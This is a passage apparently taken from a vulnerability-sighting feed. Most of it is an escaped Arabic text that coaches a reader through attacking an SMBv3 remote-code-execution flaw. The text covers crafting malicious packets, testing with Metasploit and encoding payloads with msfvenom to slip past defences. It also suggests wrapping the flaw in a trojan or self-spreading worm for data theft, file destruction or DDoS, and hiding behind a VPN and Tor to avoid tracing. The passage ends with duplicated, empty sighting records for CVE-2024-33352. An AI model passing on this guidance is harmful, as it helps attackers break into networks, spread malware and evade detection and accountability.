\u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641. \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629 \u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0647\u064a \u0639\u0646 \u0637\u0631\u064a\u0642 \u0625\u0631\u0633\u0627\u0644 \u062d\u0632\u0645 \u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u062a\u0645 \u062a\u0643\u0648\u064a\u0646\u0647\u0627 \u0628\u0634\u0643\u0644 \u062e\u0627\u0635 \u0644\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0644\u064a \u0628\u064a\u0634\u063a\u0644 \u062e\u062f\u0645\u0629 SMB \u0648\u0628\u064a\u0643\u0648\u0646 \u0627\u0644\u0647\u062f\u0641 \u0625\u0646 \u0627\u0644\u062d\u0632\u0645 \u062f\u064a \u062a\u062e\u0644\u064a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u064a\u0642\u0631\u0623 \u0628\u064a\u0627\u0646\u0627\u062a \u063a\u064a\u0631 \u0635\u062d\u064a\u062d\u0629 \u0648\u064a\u0628\u062f\u0623 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629.\n\n\u0639\u0644\u0634\u0627\u0646 \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0647\u062c\u0648\u0645 \u0623\u0648 \u062a\u0636\u064a\u0641\u0647\u0627 \u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u062e\u0628\u064a\u062b\u0629 \u0632\u064a \u0627\u0644\u0645\u0627\u0644\u0648\u064a\u0631\u060c \u0623\u0648\u0644 \u062d\u0627\u062c\u0629 \u0644\u0627\u0632\u0645 \u062a\u0639\u0645\u0644\u0647\u0627 \u0647\u064a \u0625\u0646\u0643 \u062a\u062c\u0647\u0632 \u062d\u0632\u0645 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062f\u064a \u0628\u062a\u0643\u0648\u0646 \u0639\u0628\u0627\u0631\u0629 \u0639\u0646 \u0633\u0644\u0633\u0644\u0629 \u0645\u0646 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0648\u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0648\u0627\u0641\u0642 \u0645\u0639 \u0627\u0644\u0634\u0631\u0648\u0637 \u0627\u0644\u0645\u062d\u062f\u062f\u0629 \u0644\u0644\u062b\u063a\u0631\u0629 \u0644\u0627\u0632\u0645 \u062a\u062a\u0623\u0643\u062f \u0625\u0646 \u0627\u0644\u062d\u0632\u0645 \u062f\u064a \u0645\u0635\u0645\u0645\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062a\u062e\u0644\u064a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u064a\u0642\u0631\u0623\u0647\u0627 \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0633\u0644\u064a\u0645\u0629 \u0641\u064a \u0627\u0644\u0628\u062f\u0627\u064a\u0629 \u0648\u0628\u0639\u062f \u0643\u062f\u0647 \u064a\u0646\u0641\u0630 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u0644\u064a \u0641\u064a\u0647\u0627 \u0641\u064a \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u062f\u064a \u0647\u0646\u0648\u0636\u062d \u0625\u0632\u0627\u064a \u062a\u0642\u062f\u0631 \u062a\u0646\u0641\u0630 \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0634\u0643\u0644 \u0639\u0644\u0645\u064a \u0648\u062f\u0642\u064a\u0642.\n\n\u0623\u0648\u0644\u0627\u064b\u060c \u0647\u062a\u0628\u062f\u0623 \u0628\u062a\u062d\u0644\u064a\u0644 \u0643\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0645\u0648\u062c\u0648\u062f \u0639\u0644\u0649 GitHub \u0648\u062a\u0641\u0647\u0645 \u0643\u0648\u064a\u0633 \u0625\u0632\u0627\u064a \u0628\u064a\u0634\u062a\u063a\u0644 \u0627\u0644\u062c\u0632\u0621 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062d\u0632\u0645 \u0648\u0647\u0646\u0627 \u0644\u0627\u0632\u0645 \u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0632\u064a Wireshark \u0639\u0644\u0634\u0627\u0646 \u062a\u0631\u0627\u0642\u0628 \u062d\u0631\u0643\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0648\u062a\u0641\u0647\u0645 \u0625\u0632\u0627\u064a \u0627\u0644\u062d\u0632\u0645 \u0628\u062a\u062a\u0628\u0627\u062f\u0644 \u0628\u064a\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0648\u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0648\u062f\u0647 \u0647\u064a\u0633\u0627\u0639\u062f\u0643 \u062a\u0643\u062a\u0634\u0641 \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u064a\u0641\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644. \u0628\u0639\u062f \u0643\u062f\u0647 \u0647\u062a\u0628\u062f\u0623 \u0641\u064a \u0625\u0639\u062f\u0627\u062f \u0643\u0648\u062f \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u062e\u0627\u0635 \u0628\u064a\u0643 \u0639\u0644\u0634\u0627\u0646 \u062a\u0628\u0639\u062a \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0644\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0648\u062f\u0647 \u0645\u0645\u0643\u0646 \u062a\u0639\u0645\u0644\u0647 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0644\u063a\u0627\u062a \u0628\u0631\u0645\u062c\u0629 \u0632\u064a Python \u0623\u0648 C++ \u0648\u062f\u064a \u0644\u063a\u0627\u062a \u0642\u0648\u064a\u0629 \u0648\u062a\u0642\u062f\u0631 \u062a\u0643\u062a\u0628 \u0628\u064a\u0647\u0627 \u0623\u0643\u0648\u0627\u062f \u0628\u062a\u0646\u0641\u0630 \u0623\u0648\u0627\u0645\u0631 \u0645\u0639\u0642\u062f\u0629.\n\n\u062b\u0627\u0646\u064a\u0627\u064b\u060c \u0644\u0627\u0632\u0645 \u062a\u062e\u062a\u0627\u0631 \u0627\u0644\u0647\u062f\u0641 \u0628\u062a\u0627\u0639\u0643 \u0628\u0639\u0646\u0627\u064a\u0629 \u0648\u062f\u0647 \u0628\u064a\u0643\u0648\u0646 \u0633\u064a\u0631\u0641\u0631 \u0628\u064a\u0634\u063a\u0644 \u062e\u062f\u0645\u0629 SMBv3 \u0648\u0639\u0644\u064a\u0647 \u0646\u0638\u0627\u0645 \u062a\u0634\u063a\u064a\u0644 \u0642\u0627\u0628\u0644 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0648\u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0625\u0646\u0643 \u062a\u0643\u0648\u0646 \u0645\u062c\u0647\u0632 \u0628\u064a\u0626\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0622\u0645\u0646\u0629 \u0639\u0644\u0634\u0627\u0646 \u062a\u062c\u0631\u0628 \u0639\u0644\u064a\u0647\u0627 \u0627\u0644\u0647\u062c\u0648\u0645 \u0642\u0628\u0644 \u0645\u0627 \u062a\u0646\u0641\u0630\u0647 \u0641\u064a \u0627\u0644\u0628\u064a\u0626\u0629 \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u0629 \u0648\u062a\u0642\u062f\u0631 \u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u0632\u064a Metasploit Framework \u0639\u0644\u0634\u0627\u0646 \u062a\u062e\u062a\u0628\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062a\u0639\u062f\u0644 \u0639\u0644\u0649 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0628\u062a\u0627\u0639\u062a\u0643 \u0648\u062a\u062a\u0627\u0643\u062f \u0625\u0646\u0647\u0627 \u0628\u062a\u0634\u062a\u063a\u0644 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d.\n\n\u062b\u0627\u0644\u062b\u0627\u064b\u060c \u0644\u0627\u0632\u0645 \u062a\u0636\u064a\u0641 \u0628\u0639\u0636 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u062a\u062d\u0633\u064a\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0648\u062f\u0647 \u0628\u064a\u0634\u0645\u0644 \u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062a\u062e\u0644\u064a \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0623\u0635\u0639\u0628 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0648\u0627\u062a \u0632\u064a Msfvenom \u0645\u0645\u0643\u0646 \u062a\u0636\u064a\u0641 \u0623\u0643\u0648\u0627\u062f \u062a\u0634\u0641\u064a\u0631 \u0644\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0639\u0644\u0634\u0627\u0646 \u062a\u0639\u062f\u064a \u0645\u0646 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629.\n\n\u0645\u0646 \u0636\u0645\u0646 \u0627\u0644\u062a\u062d\u0633\u064a\u0646\u0627\u062a \u0627\u0644\u0645\u0645\u0643\u0646\u0629 \u0647\u064a \u0625\u0646\u0643 \u062a\u062f\u0645\u062c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0645\u0627\u0644\u0648\u064a\u0631 \u0623\u0643\u0628\u0631 \u064a\u0639\u0646\u064a \u0645\u062b\u0644\u0627\u064b \u062a\u0642\u062f\u0631 \u062a\u0639\u0645\u0644 \u062d\u0635\u0627\u0646 \u0637\u0631\u0648\u0627\u062f\u0629 (Trojan Horse) \u0628\u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0644\u0634\u0627\u0646 \u064a\u062f\u062e\u0644 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u0628\u0639\u062f \u0643\u062f\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629 \u0632\u064a \u0633\u0631\u0642\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0623\u0648 \u062a\u062f\u0645\u064a\u0631 \u0645\u0644\u0641\u0627\u062a \u0623\u0648 \u062d\u062a\u0649 \u062a\u062d\u0645\u064a\u0644 \u0645\u0627\u0644\u0648\u064a\u0631 \u0625\u0636\u0627\u0641\u064a. \u0648\u0623\u062e\u064a\u0631\u0627\u064b \u0644\u0627\u0632\u0645 \u062a\u0643\u0648\u0646 \u062d\u0631\u064a\u0635 \u062c\u062f\u0627\u064b \u0648\u062a\u0627\u062e\u062f \u0643\u0644 \u0627\u062d\u062a\u064a\u0627\u0637\u0627\u062a\u0643 \u0639\u0644\u0634\u0627\u0646 \u0645\u062a\u062a\u0639\u0631\u0636\u0634 \u0644\u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0623\u0648 \u0627\u0644\u062a\u0639\u0642\u0628 \u064a\u0639\u0646\u064a \u0644\u0627\u0632\u0645 \u062a\u0633\u062a\u062e\u062f\u0645 \u0634\u0628\u0643\u0629 \u0648\u0647\u0645\u064a\u0629 (VPN) \u0648\u062a\u063a\u064a\u0631 \u0645\u0648\u0642\u0639\u0643 \u0628\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0648\u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u0625\u062e\u0641\u0627\u0621 \u0627\u0644\u0647\u0648\u064a\u0629 \u0632\u064a Tor.\n\n\u0644\u0627\u0632\u0645 \u062a\u0639\u0631\u0641 \u0625\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u062e\u0637\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0648\u0644\u0648 \u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d \u0645\u0645\u0643\u0646 \u062a\u0633\u0628\u0628 \u0623\u0636\u0631\u0627\u0631 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0644\u0623\u064a \u0646\u0638\u0627\u0645 \u0639\u0644\u0634\u0627\u0646 \u0643\u062f\u0647 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0628\u062a\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0628\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0648\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0628\u0627\u062a\u0634\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0646\u0632\u0644\u0647\u0627 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0639\u0644\u0634\u0627\u0646 \u062a\u0642\u0641\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u062f\u064a \u0648\u0643\u0645\u0627\u0646 \u0644\u0627\u0632\u0645 \u062a\u0643\u0648\u0646 \u0639\u0644\u0649 \u062f\u0631\u0627\u064a\u0629 \u062a\u0627\u0645\u0629 \u0628\u0643\u0644 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0637\u0628\u0642\u0647\u0627 \u0639\u0644\u0634\u0627\u0646 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643 \u0648\u0623\u062c\u0647\u0632\u062a\u0643 \u0645\u0646 \u0623\u064a \u0647\u062c\u0648\u0645 \u0645\u0645\u0643\u0646.\n\n\u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0648\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0641\u064a \u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a \u0645\u062a\u0646\u0648\u0639\u0629 \u0632\u064a \u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062a\u0648\u062c\u064a\u0647 \u0647\u062c\u0645\u0627\u062a DDoS \u0628\u0634\u0643\u0644 \u0641\u0639\u0627\u0644 \u062c\u062f\u0627\u064b. \u0648\u0644\u0648 \u0643\u0646\u062a \u0639\u0627\u0648\u0632 \u062a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0645\u0627\u0644\u0648\u064a\u0631 \u0645\u0645\u0643\u0646 \u062a\u062f\u0645\u062c\u0647\u0627 \u0641\u064a \u0628\u0631\u0646\u0627\u0645\u062c \u062e\u0628\u064a\u062b \u064a\u0642\u0648\u0645 \u0628\u0646\u0634\u0631 \u0646\u0641\u0633\u0647 \u0639\u0628\u0631 \u0627\u0644\u0634\u0628\u0643\u0629 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u062f\u0647 \u0647\u064a\u062e\u0644\u064a \u0627\u0644\u0645\u0627\u0644\u0648\u064a\u0631 \u064a\u0646\u062a\u0634\u0631 \u0628\u0633\u0631\u0639\u0629 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0634\u063a\u0627\u0644\u0629 \u0639\u0644\u0649 \u0646\u0641\u0633 \u0627\u0644\u0634\u0628\u0643\u0629 \u0648\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u062a\u0632\u0648\u062f \u0641\u0631\u0635 \u0646\u062c\u0627\u062d \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0634\u0643\u0644 \u0643\u0628\u064a\u0631.", "creation_timestamp": "2025-03-21T12:03:59.000000Z"} https://vulnerability.circl.lu/sighting/2d520f7b-8c6c-4312-a64a-5f06aabd0211/export Fri, 21 Mar 2025 12:03:59 +0000 https://vulnerability.circl.lu/sighting/dca6e1a3-4567-436f-80ea-1123aeca27b2/export {"uuid": "dca6e1a3-4567-436f-80ea-1123aeca27b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "seen", "source": "Telegram/Aa-0BibdUURQTQB8vAK81JOhZI4LJlfkqSwyDkBvxH4d8YE", "content": "", "creation_timestamp": "2026-05-08T03:00:10.000000Z"} {"uuid": "dca6e1a3-4567-436f-80ea-1123aeca27b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "seen", "source": "Telegram/Aa-0BibdUURQTQB8vAK81JOhZI4LJlfkqSwyDkBvxH4d8YE", "content": "", "creation_timestamp": "2026-05-08T03:00:10.000000Z"} https://vulnerability.circl.lu/sighting/dca6e1a3-4567-436f-80ea-1123aeca27b2/export Fri, 08 May 2026 03:00:10 +0000